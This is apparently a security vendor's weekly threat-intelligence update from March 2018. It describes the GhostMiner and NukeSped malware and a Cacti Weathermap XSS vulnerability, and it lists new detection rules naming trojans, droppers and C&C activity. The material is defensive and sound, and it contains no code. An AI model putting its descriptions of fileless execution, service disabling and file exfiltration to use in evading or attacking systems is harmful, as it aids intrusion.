Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 4th week of March 2018

New Detection Technique – GhostMiner

GhostMiner is a new cryptocurrency mining malware. By the end of March 2018, a new variant of mining malware was detected targeting MSSQL, phpMyAdmin, and Oracle WebLogic servers. The sample uses Powershell to execute code with volatile resources and scans the server's processes to detect and stop other miners that might have been running prior to execution.

The fileless malware has become more popular in the last years. The malicious code runs directly in main memory without writing any file on disk, where an antivirus engine could detect it.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, GhostMiner

New Detection Technique – NukeSped

NukeSped is a trojan first observed in the wild in 2014, which the FBI has connected to the Sony Pictures entertainment attack and North Korea in the past. This new variant in particular was first seen in early March 2018. The trojan threatens to make your files publicly available unless you follow the hacker’s instructions.

The malware first copies itself in the computer with different covert names (comon32.exe, diskpartmg16.exe, diskpartmg16.exe, dpnsvr16.exe, expandmn32.exe, hwrcompsvc64.exe, mobsynclm64.exe, rdpshellex32.exe, recdiscm32.exe, taskchg16.exe, taskhosts64.exe). Afterwards, it downloads other malware files, adds itself as a service, disables and stops other relevant services such as termservice (which allows RDP connections), and finally installs iissvr.exe. After these initial steps, NukeSped malware is capable of uploading files to a C&C server, as well as downloading and runing files as prompted in the initial hacker's threat.

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, NukeSped Variant

New Detection Techniques – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, MSIL/BackdoorAgent
  • System Compromise, Trojan infection, Win32/APosT
  • System Compromise, Trojan infection, NukeSped Variant
  • System Compromise, Trojan infection, MSIL/Balfasz
  • System Compromise, Trojan infection, W32/Luccese Stealer
  • System Compromise, Trojan infection, W32/BD2net Stealer
  • System Compromise, Trojan infection, Win32/Inerino

New Detection Techinique - Cacti Weathermap Plugin (CVE 2013-2618)

This is a known vulnerability (CVE 2013-2618) associated with Cross-site scripting (XSS). It applies to editor.php facade in Network Cacti Weathermap Plugin before version 0.97b, allowing remote attackers to inject arbitrary web scripts or HTML via the map_title parameter. Despite being identified in 2014, this vulnerability has become a new trend in CoinMiner malware distribution, particularly on Linux servers. Why a very old exploit is striking again is still unknown, but the answer could be related to the patch lag that occurs in organizations that use open-source tools.

We've added the following correlation rules as a result of additional recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Cacti Weathermap Plugin RCE (CVE 2013-2618)

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Malicious Download, PS Dropper
  • System Compromise, C&C Communication, Cobalt Group SSL
  • System Compromise, Mobile trojan infection, Trojan-Dropper.AndroidOS.Mwiam

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Delivery & Attack, Malicious website, Phishing activity
  • Exploitation & Installation, Trojan infection, Sharik
  • System Compromise, Backdoor, Bladabindi
  • System Compromise, C&C Communication, Cobalt Group C2 Domain
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Malware infection, Generic
  • System Compromise, Malware RAT, QRat
  • System Compromise, Mobile trojan infection, Android.Trojan.HiddenApp.EN
  • System Compromise, Mobile trojan infection, Hqwar Dropper
  • System Compromise, Mobile trojan infection, Trojan.AndroidOS.Triada.cx
  • System Compromise, Suspicious Behaviour, Suspicious user-agent with dropper behaviour detected
  • System Compromise, Trojan infection, Glupteba
  • System Compromise, Trojan infection, MalDoc
  • System Compromise, Trojan infection, PS/CoinMiner
  • System Compromise, Trojan infection, SmokeLoader
  • System Compromise, Trojan infection, Windows Executable Inbound via TDS